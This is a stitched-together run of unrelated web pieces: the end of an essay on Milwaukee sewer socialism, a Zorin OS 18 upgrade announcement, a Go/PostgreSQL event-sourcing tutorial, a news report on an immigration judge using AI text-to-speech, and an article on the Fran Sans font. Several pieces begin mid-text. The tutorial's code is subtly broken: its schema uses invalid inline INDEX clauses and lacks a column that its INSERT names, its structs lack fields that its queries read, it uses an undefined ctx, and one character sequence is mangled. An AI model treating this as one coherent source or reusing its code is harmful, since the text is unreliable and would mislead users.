powerful enough to convince a majority of people to actively support such an advance. This is a sobering fact to acknowledge, since it runs contrary to radicals’ longtime assumption that misleadership and cooptation are our primary obstacles to success.
But given the many structural challenges facing US leftism, the most remarkable thing about sewer socialism — and the broader New Deal that it helped pioneer — was not its limitations but rather its remarkable advances, which provided an unprecedented degree of economic security and
workplace
freedom
to countless Americans.
Relevance for Today
The history of sewer socialism provides a roadmap for radicals today aiming to build a viable alternative to Trumpism and Democratic centrism. Milwaukee’s experience shows that the Left not only can govern, but that it can do so considerably more effectively than either establishment politicians or progressive solo operators. That’s the real reason why defenders of the status quo are so worried about a democratic socialist like Zohran Mamdani.
We have much to learn from Wisconsin’s successful efforts to root socialism in the American working class. Unlike uncompromising socialists to their left, the SDP consistently oriented its agitation to the broad mass of working people, rather than a small radicalized periphery; it combined union organizing and disruptive strikes with a hard-nosed focus on winning electoral contests and policy changes; it centered workers’ material needs; it made compromises when necessary; it based its tactics on concrete analyses of public opinion and the relationship of class forces rather than imported formulas or wishful thinking; it saw that fights for widely and deeply felt demands would do more than party propaganda to radicalize millions; and, eventually, it
came to understand
the need to balance political independence with broader alliances.
Today’s radicals would do well to adopt the basic political orientation of Berger’s current. But it would be contrary to the non-dogmatic spirit of the sewer socialists to try to simply copy and paste all of their tactics. Building a nationwide third party, for example, is not feasible in our contemporary context because of exceptionally high ideological
polarization
combined with the entrenchment of America’s unique
party system
over the past century.
As we search for the most effective ways to overcome an increasingly authoritarian and oligarchic status quo, on a terrain of widespread working-class
atomization
, it would serve us well to heed Berger’s
reminder
to his comrades: “We must learn a great deal.”
[This is a working paper, the final version of which will be a much longer essay for
Catalyst
, America’s best socialist journal.
Subscribe
today to Catalyst and you’ll get my upcoming piece as well as the magazine’s other excellent content. My final paper will take a deeper dive into all the topics touched on above, as well as other questions I didn’t have space here to address, such as the evolution of SDP electoral tactics, how it supported and disciplined its elected officials, its somewhat dogmatic approach initially to labor party and farmer movements, and tensions between grassroots mass organizing and Socialist administrations in Milwaukee.]
His writings have appeared in journals such as Politics & Society, New Labor Forum, and Labor Studies Journal as well as publications such as The Nation, The Guardian, and Jacobin.
A longtime labor activist, Blanc is an organizer trainer in the
Emergency Workplace Organizing Committee
, which he helped co-found in March 2020. He directs
The Worker to Worker Collaborative
, a center to help unions and rank-and-file groups scale up their efforts by expanding their members’ involvement and leadership.
What’s even more encouraging is that
over 78% of these downloads came from Windows
. This influx of new users reflects our mission to provide a better alternative to the incumbent PC operating systems from Big Tech.
We would like to take this moment to extend a massive thank you to everyone who has downloaded, shared, and supported our biggest release ever. Your enthusiasm is what drives us to make Zorin OS even better!
Upgrades from Zorin OS 17 to 18
We’re also excited to announce that we’re officially launching upgrades from Zorin OS 17 to 18 today.
This upgrade path is in early testing and is currently only available to users of the
Zorin OS 17 Core, Education, and Pro
editions. Upgrading now will allow us to collect feedback and fix bugs to improve the user experience before its full stable launch in the coming weeks.
This upgrade path is designed to allow existing Zorin OS 17 users to upgrade their computers to Zorin OS 18 directly, without needing to re-install the operating system. This means you’ll be able to keep your files, apps, and settings, all while taking advantage of the new features and improvements in Zorin OS 18.
How to upgrade from Zorin OS 17 to 18 (in testing)
Warning:
This upgrade path is not recommended for production machines yet. Upgrading during the testing period may cause stability issues or breakages on your system.
To avoid data loss, please back up the important files on your computer to an external drive or cloud storage service.
View how to back up your files ›
Install the latest software updates by opening the Zorin Menu → System Tools → Software Updater and following the on-screen instructions.
Open the Zorin Menu → Utilities → Terminal and enter this command:
gsettings set com.zorin.desktop.upgrader show-test-upgrades true
Follow the instructions in stage 3 of
this guide
to complete the upgrade process.
After the testing period is completed in the coming weeks, this upgrade option will be available to all Zorin OS 17 users through the
Upgrade Zorin OS
app. Stay tuned to our newsletter to be the first to know when upgrades are enabled for everyone.
Event sourcing: append-only architecture processing 10K events/sec with complete history, time travel debugging, and CQRS. From theory to production implementation.
Key Takeaways
Event sourcing provides complete audit trail and time-travel debugging capabilities
CQRS separation enables independent scaling of reads and writes
Snapshots are essential for performance with large event streams
Proper event versioning and migration strategies prevent production disasters
Event streaming with Kafka enables real-time projections and system integration
Your database shows current state. But how did it get there? Who changed what? When? Why?
-- Traditional: Current state only
SELECT balance FROM accounts WHERE id = 123;
-- Result: 1000
-- Event sourced: Complete history
SELECT * FROM events WHERE aggregate_id = 123;
-- Shows every deposit, withdrawal, fee, interest
We needed audit trail for financial compliance. Event sourcing gave us that plus time travel, debugging superpowers, and perfect scalability.
Core Concepts in 5 Minutes
Event sourcing stores state changes as a sequence of events rather than overwriting data. Instead of UPDATE statements that destroy history, we append immutable events that tell the complete story.
Traditional systems show what IS. Event sourcing shows what HAPPENED. This distinction transforms debugging, auditing, and analytics. When a bug corrupts data, we can replay events to find exactly when and how it occurred.
Events are facts about the past - they cannot be changed or deleted. This immutability provides natural audit logging and enables powerful patterns like temporal queries and retroactive fixes.
State becomes a left-fold over events. Current balance isn't stored; it's calculated by replaying all deposits and withdrawals. This sounds slow but with snapshots and projections, it's actually faster than traditional systems for many use cases.
// Events capture business intent
type AccountOpened struct {
AccountID string
Currency string
}
type MoneyDeposited struct {
AccountID string
Amount decimal.Decimal
}
// State derived from event history
func (a *Account) Apply(event Event) {
// Rebuild state by replaying events
}
Production Event Store
A production event store needs to handle millions of events efficiently. Our PostgreSQL-based implementation processes 10K events/second with proper indexing and partitioning. The append-only nature makes it extremely fast - no updates, no deletes, just inserts.
Event ordering is critical for consistency. We use database sequences per aggregate to ensure events are applied in the correct order. This prevents race conditions where concurrent operations might corrupt state.
The schema design balances normalization with query performance. Event data is stored as JSON for flexibility, while frequently queried fields (aggregate_id, event_type) are indexed columns. This hybrid approach enables both fast queries and schema evolution.
Metadata tracks important context: user ID, correlation ID, causation ID. This audit trail proves invaluable for debugging and compliance. Every state change is traceable to its origin.
type EventStore struct {
db *sql.DB
}
type StoredEvent struct {
ID uuid.UUID
AggregateID string
EventType string
EventVersion int
EventData json.RawMessage
Metadata json.RawMessage
OccurredAt time.Time
}
// Append-only schema with proper indexes
const schema = `
CREATE TABLE events (
id UUID PRIMARY KEY,
aggregate_id VARCHAR(255) NOT NULL,
event_type VARCHAR(255) NOT NULL,
event_version INT NOT NULL,
event_data JSONB NOT NULL,
metadata JSONB,
occurred_at TIMESTAMP NOT NULL,
recorded_at TIMESTAMP NOT NULL DEFAULT NOW(),
-- Ensure events are ordered per aggregate
UNIQUE(aggregate_id, event_version),
-- Indexes for queries
INDEX idx_aggregate (aggregate_id, event_version),
INDEX idx_event_type (event_type),
INDEX idx_occurred_at (occurred_at)
);
-- Global event sequence for ordering
CREATE SEQUENCE IF NOT EXISTS global_event_sequence;
ALTER TABLE events ADD COLUMN global_sequence BIGINT DEFAULT nextval('global_event_sequence');
CREATE INDEX idx_global_sequence ON events(global_sequence);
`
func (es *EventStore) SaveEvents(ctx context.Context, aggregateID, aggregateType string, events []Event, expectedVersion int) error {
tx, err := es.db.BeginTx(ctx, nil)
if err != nil {
return err
}
defer tx.Rollback()
// Check optimistic concurrency
var currentVersion int
err = tx.QueryRow(`
SELECT COALESCE(MAX(event_version), 0)
FROM events
WHERE aggregate_id = $1`,
aggregateID,
).Scan(¤tVersion)
if err != nil {
return err
}
if currentVersion != expectedVersion {
return fmt.Errorf("concurrency conflict: expected version %d, got %d",
expectedVersion, currentVersion)
}
// Save events
version := expectedVersion
for _, event := range events {
version++
eventData, err := json.Marshal(event)
if err != nil {
return err
}
metadata := map[string]interface{}{
"user_id": ctx.Value("user_id"),
"trace_id": ctx.Value("trace_id"),
"source": ctx.Value("source"),
}
metadataJSON, _ := json.Marshal(metadata)
_, err = tx.Exec(`
INSERT INTO events (
aggregate_id, aggregate_type, event_type,
event_version, event_data, metadata, occurred_at
) VALUES ($1, $2, $3, $4, $5, $6, $7)`,
aggregateID,
aggregateType,
event.EventType(),
version,
eventData,
metadataJSON,
event.OccurredAt(),
)
if err != nil {
return err
}
}
return tx.Commit()
}
func (es *EventStore) GetEvents(ctx context.Context, aggregateID string, fromVersion int) ([]StoredEvent, error) {
rows, err := es.db.QueryContext(ctx, `
SELECT
id, aggregate_id, aggregate_type, event_type,
event_version, event_data, metadata,
occurred_at, recorded_at
FROM events
WHERE aggregate_id = $1 AND event_version > $2
ORDER BY event_version`,
aggregateID, fromVersion,
)
if err != nil {
return nil, err
}
defer rows.Close()
var events []StoredEvent
for rows.Next() {
var e StoredEvent
err := rows.Scan(
&e.ID, &e.AggregateID, &e.AggregateType,
&e.EventType, &e.EventVersion, &e.EventData,
&e.Metadata, &e.OccurredAt, &e.RecordedAt,
)
if err != nil {
return nil, err
}
events = append(events, e)
}
return events, nil
}
Aggregate Root Pattern
type AggregateRoot struct {
ID string
Version int
uncommittedEvents []Event
}
func (a *AggregateRoot) RecordEvent(event Event) {
a.uncommittedEvents = append(a.uncommittedEvents, event)
a.Version++
}
func (a *AggregateRoot) GetUncommittedEvents() []Event {
return a.uncommittedEvents
}
func (a *AggregateRoot) MarkEventsAsCommitted() {
a.uncommittedEvents = []Event{}
}
// Example: Account aggregate
type Account struct {
AggregateRoot
Balance decimal.Decimal
Currency string
Status string
}
func (a *Account) Deposit(amount decimal.Decimal) error {
if amount.LessThanOrEqual(decimal.Zero) {
return fmt.Errorf("invalid deposit amount: %v must be positive", amount)
}
event := MoneyDeposited{
AccountID: a.ID,
Amount: amount,
Timestamp: time.Now(),
}
a.Apply(event)
a.RecordEvent(event)
return nil
}
func (a *Account) Withdraw(amount decimal.Decimal) error {
if amount.GreaterThan(a.Balance) {
return fmt.Errorf("insufficient funds: attempting to withdraw %v from balance %v", amount, a.Balance)
}
event := MoneyWithdrawn{
AccountID: a.ID,
Amount: amount,
Timestamp: time.Now(),
}
a.Apply(event)
a.RecordEvent(event)
return nil
}
func (a *Account) Apply(event Event) {
switch e := event.(type) {
case MoneyDeposited:
a.Balance = a.Balance.Add(e.Amount)
case MoneyWithdrawn:
a.Balance = a.Balance.Sub(e.Amount)
}
}
CQRS: Command and Query Separation
// Write side: Commands modify aggregates
type CommandHandler struct {
eventStore *EventStore
eventBus *EventBus
}
func (h *CommandHandler) Handle(cmd Command) error {
switch c := cmd.(type) {
case DepositMoney:
return h.handleDeposit(c)
case WithdrawMoney:
return h.handleWithdraw(c)
}
return errors.New("unknown command")
}
func (h *CommandHandler) handleDeposit(cmd DepositMoney) error {
// Load aggregate from events
account := &Account{}
events, err := h.eventStore.GetEvents(ctx, cmd.AccountID, 0)
if err != nil {
return err
}
for _, e := range events {
account.Apply(e)
}
// Execute business logic
err = account.Deposit(cmd.Amount)
if err != nil {
return err
}
// Save new events
err = h.eventStore.SaveEvents(
ctx,
account.ID,
"Account",
account.GetUncommittedEvents(),
account.Version,
)
if err != nil {
return err
}
// Publish for projections
for _, event := range account.GetUncommittedEvents() {
h.eventBus.Publish(event)
}
return nil
}
// Read side: Projections for queries
type AccountProjection struct {
db *sql.DB
}
func (p *AccountProjection) Handle(event Event) error {
switch e := event.(type) {
case MoneyDeposited:
_, err := p.db.Exec(`
UPDATE account_projections
SET balance = balance + $1, updated_at = NOW()
WHERE account_id = $2`,
e.Amount, e.AccountID,
)
return err
case MoneyWithdrawn:
_, err := p.db.Exec(`
UPDATE account_projections
SET balance = balance - $1, updated_at = NOW()
WHERE account_id = $2`,
e.Amount, e.AccountID,
)
return err
}
return nil
}
// Query handler reads from projections
type QueryHandler struct {
db *sql.DB
}
func (q *QueryHandler) GetAccountBalance(accountID string) (decimal.Decimal, error) {
var balance decimal.Decimal
err := q.db.QueryRow(`
SELECT balance FROM account_projections WHERE account_id = $1`,
accountID,
).Scan(&balance)
return balance, err
}
⚠️ Eventual Consistency Tradeoff
CQRS introduces
eventual consistency
between write and read models:
Events are written immediately to the event store
Projections update asynchronously (typically milliseconds to seconds)
Queries may return stale data until projections catch up
Design your UX to handle this: optimistic UI updates, "processing" states, or read-your-writes guarantees where critical
Snapshots for Performance
type Snapshot struct {
AggregateID string
Version int
Data []byte
CreatedAt time.Time
}
func (es *EventStore) SaveSnapshot(ctx context.Context, snapshot Snapshot) error {
_, err := es.db.ExecContext(ctx, `
INSERT INTO snapshots (aggregate_id, version, data, created_at)
VALUES ($1, $2, $3, $4)
ON CONFLICT (aggregate_id)
DO UPDATE SET version = $2, data = $3, created_at = $4`,
snapshot.AggregateID,
snapshot.Version,
snapshot.Data,
snapshot.CreatedAt,
)
return err
}
func (es *EventStore) GetSnapshot(ctx context.Context, aggregateID string) (*Snapshot, error) {
var s Snapshot
err := es.db.QueryRowContext(ctx, `
SELECT aggregate_id, version, data, created_at
FROM snapshots
WHERE aggregate_id = $1`,
aggregateID,
).Scan(&s.AggregateID, &s.Version, &s.Data, &s.CreatedAt)
if err == sql.ErrNoRows {
return nil, nil
}
return &s, err
}
// Load aggregate with snapshot optimization
func LoadAccount(es *EventStore, accountID string) (*Account, error) {
account := &Account{}
// Try to load snapshot
snapshot, err := es.GetSnapshot(ctx, accountID)
if err != nil {
return nil, err
}
fromVersion := 0
if snapshot != nil {
// Restore from snapshot
err = json.Unmarshal(snapshot.Data, account)
if err != nil {
return nil, err
}
fromVersion = snapshot.Version
}
// Apply events after snapshot
events, err := es.GetEvents(ctx, accountID, fromVersion)
if err != nil {
return nil, err
}
for _, e := range events {
account.Apply(e)
}
// Create new snapshot every 100 events
if len(events) > 100 {
snapshotData, _ := json.Marshal(account)
es.SaveSnapshot(ctx, Snapshot{
AggregateID: accountID,
Version: account.Version,
Data: snapshotData,
CreatedAt: time.Now(),
})
}
return account, nil
}
Event Streaming with Kafka
type EventStreamer struct {
eventStore *EventStore
producer *kafka.Writer
lastSeq int64
}
func (s *EventStreamer) StreamEvents(ctx context.Context) {
ticker := time.NewTicker(100 * time.Millisecond)
defer ticker.Stop()
for {
select {
case <-ctx.Done():
return
case <-ticker.C:
s.publishNewEvents(ctx)
}
}
}
func (s *EventStreamer) publishNewEvents(ctx context.Context) {
rows, err := s.eventStore.db.QueryContext(ctx, `
SELECT
global_sequence, aggregate_id, event_type,
event_data, occurred_at
FROM events
WHERE global_sequence > $1
ORDER BY global_sequence
LIMIT 1000`,
s.lastSeq,
)
if err != nil {
return
}
defer rows.Close()
var messages []kafka.Message
var maxSeq int64
for rows.Next() {
var seq int64
var aggregateID, eventType string
var eventData json.RawMessage
var occurredAt time.Time
rows.Scan(&seq, &aggregateID, &eventType, &eventData, &occurredAt)
messages = append(messages, kafka.Message{
Topic: fmt.Sprintf("events.%s", eventType),
Key: []byte(aggregateID),
Value: eventData,
Headers: []kafka.Header{
{Key: "event_type", Value: []byte(eventType)},
{Key: "occurred_at", Value: []byte(occurredAt.Format(time.RFC3339))},
},
})
maxSeq = seq
}
if len(messages) > 0 {
err := s.producer.WriteMessages(ctx, messages...)
if err == nil {
s.lastSeq = maxSeq
}
}
}
Temporal Queries (Time Travel)
// Get account state at specific point in time
func (es *EventStore) GetAggregateAtTime(ctx context.Context, aggregateID string, pointInTime time.Time) (*Account, error) {
events, err := es.db.QueryContext(ctx, `
SELECT event_type, event_data
FROM events
WHERE aggregate_id = $1 AND occurred_at <= $2
ORDER BY event_version`,
aggregateID, pointInTime,
)
if err != nil {
return nil, err
}
defer events.Close()
account := &Account{}
for events.Next() {
var eventType string
var eventData json.RawMessage
events.Scan(&eventType, &eventData)
event := deserializeEvent(eventType, eventData)
account.Apply(event)
}
return account, nil
}
// Replay events for debugging
func ReplayEvents(es *EventStore, from, to time.Time, handler func(Event)) error {
rows, err := es.db.Query(`
SELECT event_type, event_data, occurred_at
FROM events
WHERE occurred_at BETWEEN $1 AND $2
ORDER BY global_sequence`,
from, to,
)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var eventType string
var eventData json.RawMessage
var occurredAt time.Time
rows.Scan(&eventType, &eventData, &occurredAt)
event := deserializeEvent(eventType, eventData)
handler(event)
}
return nil
}
Saga Pattern for Distributed Transactions
type TransferSaga struct {
ID string
FromAccount string
ToAccount string
Amount decimal.Decimal
State string
CompletedSteps []string
}
func (s *TransferSaga) Handle(event Event) ([]Command, error) {
switch e := event.(type) {
case TransferInitiated:
return []Command{
WithdrawMoney{AccountID: e.FromAccount, Amount: e.Amount},
}, nil
case MoneyWithdrawn:
if e.AccountID == s.FromAccount {
s.CompletedSteps = append(s.CompletedSteps, "withdrawn")
return []Command{
DepositMoney{AccountID: s.ToAccount, Amount: s.Amount},
}, nil
}
case MoneyDeposited:
if e.AccountID == s.ToAccount {
s.State = "completed"
return []Command{
MarkTransferComplete{TransferID: s.ID},
}, nil
}
case WithdrawFailed:
s.State = "failed"
return nil, nil
case DepositFailed:
// Compensate - refund the withdrawal
return []Command{
DepositMoney{AccountID: s.FromAccount, Amount: s.Amount},
}, nil
}
return nil, nil
}
Event Store Consistency Warning
Event stores require careful attention to:
Optimistic concurrency control to prevent data corruption
Event ordering guarantees within aggregates
Backup and recovery procedures for event streams
Event schema evolution and versioning strategies
Security Considerations
Event Sourcing Security Best Practices
Event Encryption:
Encrypt sensitive data in event payloads
Access Control:
Role-based access to event streams and projections
Audit Trail:
Include user context and authorization in event metadata
Data Privacy:
Implement "right to be forgotten" through cryptographic erasure
Replay Security:
Ensure event replay doesn't bypass current security rules
// Secure event with encryption
type SecureEvent struct {
BaseEvent
EncryptedPayload []byte
KeyID string
Nonce []byte
}
// GDPR-compliant cryptographic erasure
type GDPREventStore struct {
*EventStore
keyManager *KeyManager
}
func (ges *GDPREventStore) ForgetUser(ctx context.Context, userID string) error {
events, err := ges.GetEventsByUser(ctx, userID)
if err != nil {
return fmt.Errorf("failed to find user events: %w", err)
}
for _, event := range events {
if err := ges.keyManager.RevokeKey(event.KeyID); err != nil {
return fmt.Errorf("failed to revoke key %s: %w", event.KeyID, err)
}
}
return ges.MarkUserForgotten(ctx, userID)
}
Testing Strategy
📊 Event Sourcing Testing Framework
Comprehensive testing approach for event-sourced systems:
Event Store Tests:
Test consistency, concurrency, and durability
Aggregate Tests:
Unit test business logic and invariants
Projection Tests:
Verify read model consistency
Integration Tests:
End-to-end command/query flows
Event Schema Tests:
Test event evolution and migration
// Event store integration test
func TestEventStore(t *testing.T) {
es := setupTestEventStore(t)
defer es.Close()
t.Run("ConcurrencyControl", func(t *testing.T) {
aggregateID := uuid.New().String()
// First save succeeds
err := es.SaveEvents(context.Background(), aggregateID, "Account",
[]Event{&AccountOpened{AccountID: aggregateID}}, 0)
require.NoError(t, err)
// Second save with wrong version fails
err = es.SaveEvents(context.Background(), aggregateID, "Account",
[]Event{&MoneyDeposited{AccountID: aggregateID}}, 0)
require.Error(t, err)
require.Contains(t, err.Error(), "concurrency conflict")
})
}
Production Monitoring
// Event store metrics
type Metrics struct {
EventsWritten prometheus.Counter
EventsRead prometheus.Counter
SnapshotCreated prometheus.Counter
WriteLatency prometheus.Histogram
ReadLatency prometheus.Histogram
}
// Health checks
func (es *EventStore) HealthCheck() error {
// Check write capability
testEvent := HealthCheckEvent{
ID: uuid.New().String(),
Timestamp: time.Now(),
}
err := es.SaveEvents(ctx, "health", "HealthCheck", []Event{testEvent}, 0)
if err != nil {
return fmt.Errorf("write check failed: %w", err)
}
// Check read capability
events, err := es.GetEvents(ctx, "health", 0)
if err != nil {
return fmt.Errorf("read check failed: %w", err)
}
if len(events) == 0 {
return errors.New("no events found")
}
return nil
}
// Lag monitoring
func MonitorProjectionLag(db *sql.DB) {
ticker := time.NewTicker(10 * time.Second)
for range ticker.C {
var lag time.Duration
db.QueryRow(`
SELECT MAX(NOW() - updated_at)
FROM projection_checkpoints`
).Scan(&lag)
projectionLag.Set(lag.Seconds())
if lag > 5*time.Minute {
alert("Projection lag exceeds 5 minutes")
}
}
}
Performance Optimizations
// 1. Batch event writes
func (es *EventStore) SaveEventsBatch(events []EventWithAggregate) error {
// Use COPY for bulk insert
stmt, err := es.db.Prepare(pq.CopyIn("events",
"aggregate_id", "aggregate_type", "event_type",
"event_version", "event_data", "occurred_at"))
if err != nil {
return err
}
for _, e := range events {
_, err = stmt.Exec(e.AggregateID, e.AggregateType,
e.EventType, e.Version, e.Data, e.OccurredAt)
if err != nil {
return err
}
}
return stmt.Close()
}
// 2. Parallel projection updates
func UpdateProjectionsParallel(events []Event) {
var wg sync.WaitGroup
ch := make(chan Event, 100)
// Start workers
for i := 0; i < 10; i++ {
wg.Add(1)
go func() {
defer wg.Done()
for event := range ch {
updateProjection(event)
}
}()
}
// Send events
for _, e := range events {
ch <- e
}
close(ch)
wg.Wait()
}
// 3. Cache aggregates
var aggregateCache = cache.New(5*time.Minute, 10*time.Minute)
func LoadAccountCached(es *EventStore, accountID string) (*Account, error) {
if cached, found := aggregateCache.Get(accountID); found {
return cached.(*Account), nil
}
account, err := LoadAccount(es, accountID)
if err != nil {
return nil, err
}
aggregateCache.Set(accountID, account, cache.DefaultExpiration)
return account, nil
}
Migration from Traditional System
// Generate events from existing state
func MigrateToEventSourcing(db *sql.DB, es *EventStore) error {
rows, err := db.Query(`
SELECT id, balance, created_at, updated_at
FROM accounts`)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var id string
var balance decimal.Decimal
var createdAt, updatedAt time.Time
rows.Scan(&id, &balance, &createdAt, &updatedAt)
// Create initial event
events := []Event{
AccountOpened{
AccountID: id,
Timestamp: createdAt,
},
}
// Infer deposit event from balance
if balance.GreaterThan(decimal.Zero) {
events = append(events, MoneyDeposited{
AccountID: id,
Amount: balance,
Timestamp: updatedAt,
})
}
es.SaveEvents(ctx, id, "Account", events, 0)
}
return nil
}
Lessons from Production
Metric
Before (CRUD)
After (Event Sourcing)
Write throughput
1K/sec
10K/sec
Read latency p99
5ms
2ms (projections)
Audit completeness
60%
100%
Debug time
Hours
Minutes (replay)
Storage cost
$1K/month
$3-5K/month
When NOT to Use Event Sourcing
CRUD is sufficient (most apps)
No audit requirements
Simple domain logic
Team unfamiliar with the pattern
Storage cost is critical
The Verdict
Event sourcing isn't free. 3-5x storage cost (events + projections + snapshots). Complex to implement. Mental model shift.
But for financial systems, audit-heavy domains, or complex business logic? It's transformative. Complete history, perfect audit trail, time travel debugging, and horizontal scalability.
Start small:
Event source one aggregate. See the benefits. Then expand. Don't go all-in immediately.
Scoop: Judge Caught Using AI to Read His Court Decisions
WASHINGTON —
Immigration Judge John P. Burns has been using artificial intelligence to generate audio recordings of his courtroom decisions at the New York Broadway Immigration Court, according to internal Executive Office for Immigration Review (EOIR) records obtained by
Migrant Insider.
MIGRANT INSIDER is sponsored by:
“That seems highly unusual,” said a senior Justice Department official familiar with EOIR operations, who requested anonymity to discuss internal matters. The official could not confirm whether Burns employs the AI to draft full written decisions or only to read his written rulings aloud using text‑to‑speech software, according to audio files reviewed by
Migrant Insider
.
The concern comes months after Acting EOIR Director Sirce E. Owen circulated Policy Memorandum 25‑40, which acknowledged that the immigration courts have “neither a blanket prohibition on the use of generative AI in its proceedings nor a mandatory disclosure requirement regarding its use.”
The August memo—distributed internally to all immigration judges and court administrators—permitted individual courts to adopt local standing orders on AI use but did not require them to disclose when such technologies are applied in adjudications.
The memo’s omission of any restriction on text‑to‑voice or AI‑generated decision delivery appears to leave it to individual judges’ discretion. Burns appears to be among the first to take advantage of that gap. His courtroom assistants said the use of “voice rendering” software began earlier this year and is now a regular feature of his decisions.
Burns’ use of AI tools comes amid controversy over his record as one of the most restrictive immigration judges in the country. According to
data
compiled by
, Burns approved just 2 percent of asylum claims between fiscal 2019 and 2025—compared with a national average of 57.7 percent. Pathfinder
data
show the same 2 percent benchmark, placing him among the lowest nationwide.
The numbers have fueled criticism from immigration advocates, who say the fusion of extreme denial rates with opaque AI‑assisted adjudication threatens defendants’ faith in the system. “When a person’s freedom depends on a judge’s voice, there needs to be certainty that it’s the judge’s own reasoning being rendered—not a synthesized layer of technology,” said one immigration lawyer who practices before the Broadway court.
Internal EOIR emails released through the memos show that Burns’ path to the bench was unusually political. Initially interviewed in May 2020, he was rated “highly qualified” by two Assistant Chief Immigration Judges for his litigation experience but ranked overall as “Not Recommend.” Senior EOIR leadership later overrode that ranking—reclassifying him as “Highly Recommended” in September 2020, just as Trump‑era DOJ officials accelerated appointments of judges with prosecutorial backgrounds.
At the time of his selection, Burns served as an Assistant Chief Counsel for U.S. Immigration and Customs Enforcement (ICE) in New York, where he represented the government in removal proceedings and appeals. His résumé and military record were cited in his eventual appointment announcement that December, one of 14 judges named by the outgoing administration. Nearly all came from government enforcement roles, according to EOIR data logs.
The Burns memos form part of a broader DOJ paper trail indicating a systematic reshaping of the immigration judiciary. Recent EOIR correspondence references the removal—through firings and resignations—of more than 125 judges since January, replaced with politically aligned appointees.
An
August rule
further loosened hiring standards, allowing the Attorney General to appoint “any licensed attorney” as a temporary immigration judge.
EOIR declined to comment on Burns’ use of text‑to‑voice technology or his designation history. A Justice Department spokesperson responded only that “immigration judges apply the law to the facts of each case.”
But as AI applications quietly enter immigration courtrooms without disclosure requirements or oversight, experts warn of an accelerating shift. “We’re witnessing the automation of adjudication in a system that already struggles with fairness,” said one former EOIR official. “When the human element fades, so does accountability.”
If you’ve read this far, you understand why transparency matters. If you value investigations like this,
subscribe
or
donate
to help Migrant Insider keep pressing for answers.
Fran Sans – font inspired by San Francisco light rail displays
Written by EMILY SNEDDON
Published on 6TH NOVEMBER 2025
Fran Sans
is a display font in every sense of the term. It’s an interpretation of the destination displays found on some of the light rail vehicles that service the city of San Francisco.
SFMTA Photo Department
I say
some
because destination displays aren’t consistently used across the city’s transit system. In fact, SF has an unusually high number of independent public transit agencies. Unlike New York, Chicago or L.A., which each have one, maybe two, San Francisco and the greater Bay Area have over two dozen. Each agency, with its own models of buses and trains, use different destination displays, creating an eclectic patchwork of typography across the city.
Among them, one display in particular has always stood out to me: the LCD panel displays inside Muni’s Breda Light Rail Vehicles. I remember first noticing them on a Saturday in October on the N-Judah, heading to the Outer Sunset for a shrimp hoagie. This context is important, as anyone who’s spent an October weekend in SF knows this is the optimal vibe to really take in the beauty of the city.
What caught my eye was how the displays look mechanical and yet distinctly personal. Constructed on a 3×5 grid, the characters are made up of geometric modules: squares, quarter-circles, and angled forms. Combined, these modules create imperfect, almost primitive letterforms, revealing a utility and charm that feels distinctly like the San Francisco I’ve come to know.
This balance of utility and charm seems to show up everywhere in San Francisco and its history. The Golden Gate’s “International Orange” started as nothing more than a rust-proof primer, yet is now the city’s defining colour. The Painted Ladies became multicoloured icons after the 1960s Colourist movement covered decades of grey paint. Even the steepness of the streets was once an oversight in city planning but has since been romanticised in films and on postcards. So perhaps it is unsurprising that I would find this same utility and charm in a place as small and functional as a train sign.
To learn more about these displays, I visited the San Francisco Municipal Transportation Agency’s (SFMTA) Electronics Shop at Balboa Park. There, technician Armando Lumbad had set up one of the signs. They each feature one large LCD panel which displays the line name, and twenty-four smaller ones to display the destination. The loose spacing of the letters and fluorescent backlighting gives the sign a raw, analogue quality. Modern LED dot-matrix displays are far more efficient and flexible, but to me, they lack the awkwardness that makes these Breda signs so delightful.
Armando showed me how the signs work. He handed me a printed matrix table listing every line and destination, each paired with a three-digit code. On route, train operators punch the code into a control panel at the back of the display, and the LCD blocks light on specific segments of the grid to build each letter. I picked code 119, and Armando entered it for me. A few seconds later the panels revealed my own stop: the N-Judah at Church & Duboce. There in the workshop, devoid of the context of the trains and the commute, the display looked almost monolithic, or sculptural, and I have since fantasised whether it would be possible to ship one of these home to Australia.
Looking inside of the display, I found labels identifying the make and model. The signs were designed and manufactured by Trans-Lite, Inc., a company based in Milford, Connecticut that specialised in transport signage from 1959 until its acquisition by the Nordic firm Teknoware in 2012. After lots of amateur detective work, and with the help from an anonymous Reddit user in a Connecticut community group, I was connected with Gary Wallberg, Senior Engineer at Trans-Lite and the person responsible for the design of these very signs back in 1999.
Original drawings of the display, courtesy of William Maley Jnr, former owner and CEO of TRANS-LITE, INC.
Learning that the alphabet came from an engineer really explains its temperament and why I was drawn to it in the first place. The signs were designed for sufficiency: fixed segments, fixed grid, and no extras. Characters were created only as destinations required them, while other characters, like the Q, X, and much of the punctuation, were never programmed into the signs. In reducing everything to its bare essentials, somehow character emerged, and it’s what inspired me to design Fran Sans.
I shared some initial drawings with Dave Foster of
Foster Type
who encouraged me to get the font software Glyphs and turn it into my first working font. From there, I broke down the anatomy of the letters into modules, then used them like Lego to build out a full set: uppercase A–Z, numerals, core punctuation.
Some glyphs remain unsolved in this first version, for example the standard @ symbol refuses to squeeze politely into the 3×5 logic. Lowercase remains a question for the future, and would likely mean reconsidering the grid. But, as with the displays themselves, I am judging Fran Sans as sufficient for now.
Grid comparison. Left is a photo of the display, right is Fran Sans.
Getting up close to these signs, you’ll notice Fran Sans’ gridlines are simplified even from its real‑life muse, but my hope is that its character remains. Specifically: the N and the zero, where the unusually thick diagonals close in on the counters; and the Z and 7, whose diagonals can feel uncomfortably thin. I’ve also noticed the centre of the M can scale strangely and read like an H at small sizes, but in fairness, this type was never designed for the kind of technical detail so many monospaced fonts aim for. Throughout the process I tried to protect these unorthodox moments, because to me, they determined the success of this interpretation.
Fran Sans comes in three styles: Solid, Tile, and Panel, each building in visual complexity. The decision to include variations, particularly the Solid style, was inspired by my time working at
Christopher Doyle & Co.
There, we worked with Bell Shakespeare, Australia’s national theatre company dedicated to the works of William Shakespeare. The equity of the Bell Shakespeare brand lies in its typography, which is a beautiful custom typeface called Hotspur, designed and produced by none other than Dave Foster.
Hotspur by DAVE FOSTER.
Often, brand fonts are chosen or designed to convey a single feeling. Maybe it’s warmth and friendliness, or a sense of tech and innovation. But what I’ve always loved about the Bell typeface is how one weight could serve both Shakespeare’s comedies and tragedies, simply by shifting scale, spacing, or alignment. Hotspur has the gravity to carry the darkness of
Titus Andronicus
and the roundness to convey the humour of
Much Ado About Nothing
. And while Fran Sans Solid is technically no Hotspur, I wanted it to share that same versatility.
